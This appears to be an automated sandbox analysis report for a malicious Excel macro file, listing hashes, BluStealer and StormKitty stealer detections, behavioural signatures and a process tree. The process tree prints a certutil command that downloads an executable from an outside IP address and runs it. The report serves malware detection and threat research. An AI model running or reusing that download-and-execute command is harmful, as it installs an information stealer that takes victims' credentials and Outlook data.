Overview

overview

10

Static

static

286368248040.xlsm

windows7-x64

10

286368248040.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-09-2022 21:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    286368248040.xlsm

  • Size

    42KB

  • MD5

    5cdfa549f5e80c05cf53baec3ebaab42

  • SHA1

    5c7653c921c7414ebb0407d92bb7e84866572e9a

  • SHA256

    462e92b06c97f897081e9a438b5bda04bd199e32690e9a04d063d485545e3da5

  • SHA512

    c3b964067e294b1fe738f8359a7bfc3ed5401495dd8510ec0c7a6184dc8d62802859874286da4d80f0cf7a514ac474de98e5111436eb893e328a64d3d87a8f58

  • SSDEEP

    768:EvjcKv+ssnbaBIJYfTH+niSpivDHvJv+nWtFFiKk/f/qt1pTxRN+nkaszH:EvLv+TbaG1B+TvJv+OFFi3/Hq31xikaQ

Score
10/10
blustealerstormkittycollectionstealer

Malware Config

Signatures

  • BluStealer

    A Modular information stealer written in Visual Basic.

    stealerblustealer
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\286368248040.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c certutil.exe -urlcache -split -f "http://195.178.120.230/doctor/tikto.exe" Ogeczxegtyqonfibmt.exe.exe && Ogeczxegtyqonfibmt.exe.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4340
      • C:\Windows\system32\certutil.exe
        certutil.exe -urlcache -split -f "http://195.178.120.230/doctor/tikto.exe" Ogeczxegtyqonfibmt.exe.exe
        3⤵
          PID:3792
        • C:\Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe
          Ogeczxegtyqonfibmt.exe.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3668
          • C:\Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe
            C:\Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4036
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              5⤵
              • Accesses Microsoft Outlook profiles
              • Checks processor information in registry
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:3220

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe
      Filesize

      22KB

      MD5

      08b2333c8a3dd59e9ee7fa36684bddce

      SHA1

      a21975e4d5fd409ae791997d63aac4fc3e6165bc

      SHA256

      155c5fe41943219ffa5a38c74430d8f7e910f16e23e26f1cdd0d39de70c54fb7

      SHA512

      9748d5c5c59d53ab6458b888a40126b08d5cb300e83749c6abdea438fb4a28b4850521c0436e61daf3ac28dcda9f5260d3909967855d039f6bdca2a7aeac2c35

      Download Submit

    • C:\Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe
      Filesize

      22KB

      MD5

      08b2333c8a3dd59e9ee7fa36684bddce

      SHA1

      a21975e4d5fd409ae791997d63aac4fc3e6165bc

      SHA256

      155c5fe41943219ffa5a38c74430d8f7e910f16e23e26f1cdd0d39de70c54fb7

      SHA512

      9748d5c5c59d53ab6458b888a40126b08d5cb300e83749c6abdea438fb4a28b4850521c0436e61daf3ac28dcda9f5260d3909967855d039f6bdca2a7aeac2c35

      Download Submit

    • C:\Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe
      Filesize

      22KB

      MD5

      08b2333c8a3dd59e9ee7fa36684bddce

      SHA1

      a21975e4d5fd409ae791997d63aac4fc3e6165bc

      SHA256

      155c5fe41943219ffa5a38c74430d8f7e910f16e23e26f1cdd0d39de70c54fb7

      SHA512

      9748d5c5c59d53ab6458b888a40126b08d5cb300e83749c6abdea438fb4a28b4850521c0436e61daf3ac28dcda9f5260d3909967855d039f6bdca2a7aeac2c35

      Download Submit

    • memory/2040-138-0x00007FFAB5780000-0x00007FFAB5790000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2040-135-0x00007FFAB7CB0000-0x00007FFAB7CC0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2040-137-0x00007FFAB5780000-0x00007FFAB5790000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2040-165-0x00007FFAB7CB0000-0x00007FFAB7CC0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2040-166-0x00007FFAB7CB0000-0x00007FFAB7CC0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2040-164-0x00007FFAB7CB0000-0x00007FFAB7CC0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2040-136-0x00007FFAB7CB0000-0x00007FFAB7CC0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2040-134-0x00007FFAB7CB0000-0x00007FFAB7CC0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2040-133-0x00007FFAB7CB0000-0x00007FFAB7CC0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2040-163-0x00007FFAB7CB0000-0x00007FFAB7CC0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2040-132-0x00007FFAB7CB0000-0x00007FFAB7CC0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3220-158-0x0000000001220000-0x000000000123A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3220-159-0x0000000005680000-0x00000000056E6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3220-160-0x0000000005FF0000-0x000000000608C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/3668-148-0x0000000006C10000-0x0000000006C32000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3668-147-0x00000000062C0000-0x00000000062CA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3668-146-0x0000000006090000-0x0000000006122000-memory.dmp

      Filesize

      584KB

      Download

    • memory/3668-145-0x0000000005840000-0x0000000005DE4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3668-144-0x00000000009B0000-0x00000000009BC000-memory.dmp

      Filesize

      48KB

      Download

    • memory/4036-156-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4036-161-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4036-153-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4036-150-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

      Download